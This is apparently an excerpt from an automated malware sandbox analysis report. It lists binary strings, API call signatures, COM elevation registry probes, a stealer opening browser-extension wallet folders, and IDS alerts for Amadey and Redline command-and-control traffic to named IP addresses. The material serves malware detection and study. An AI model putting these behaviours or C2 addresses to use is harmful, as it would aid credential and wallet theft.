Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408438351.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2407874978.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2414099515.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408870662.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411536090.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2409067450.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403603084.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413097007.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2407216629.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2406846700.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: dwVrTdy.exe, 00000009.00000003.2123748966.000001B9CFD20000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000000C.00000000.2123985997.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000C.00000002.2145233221.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000E.00000000.2144190009.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000F.00000000.2184398416.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 00000015.00000000.2210905809.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000001C.00000000.2376475392.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412551872.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413689058.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F28A90 NetUserEnum,WideCharToMultiByte,WideCharToMultiByte,NetApiBufferFree,_invalid_parameter_noinfo_noreturn,	9_2_00007FF643F28A90
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684568A90 NetUserEnum,WideCharToMultiByte,WideCharToMultiByte,NetApiBufferFree,_invalid_parameter_noinfo_noreturn,	11_2_00007FF684568A90
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD68A90 NetUserEnum,WideCharToMultiByte,WideCharToMultiByte,NetApiBufferFree,_invalid_parameter_noinfo_noreturn,	13_2_00007FF61DD68A90

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F5E3CC FindClose,FindFirstFileExW,GetLastError,	9_2_00007FF643F5E3CC
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F5E440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	9_2_00007FF643F5E440
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F29B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	9_2_00007FF643F29B00
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F8070C FindFirstFileExW,	9_2_00007FF643F8070C
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF68459E3CC FindClose,FindFirstFileExW,GetLastError,	11_2_00007FF68459E3CC
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF68459E440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	11_2_00007FF68459E440
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684569B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	11_2_00007FF684569B00
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845C070C FindFirstFileExW,	11_2_00007FF6845C070C
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D5FA54 FindFirstFileExW,	12_2_00007FF711D5FA54
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D4CD08 FindClose,FindFirstFileExW,GetLastError,	12_2_00007FF711D4CD08
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D4CD7C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	12_2_00007FF711D4CD7C
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD69B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	13_2_00007FF61DD69B00
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD9E440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	13_2_00007FF61DD9E440
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD9E3CC FindClose,FindFirstFileExW,GetLastError,	13_2_00007FF61DD9E3CC
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDC070C FindFirstFileExW,	13_2_00007FF61DDC070C

Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\

Source: firefox.exe

Memory has grown: Private usage: 3MB later: 185MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.10:49856
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:49868 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.10:49848 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:49884 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:49904 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:49926 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:49938 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:49938 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:49938 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:49933 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:49933 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:49933 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:49943 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:49943 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:49943 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:49951 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:49970 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.10:49987 -> 185.81.68.147:1912
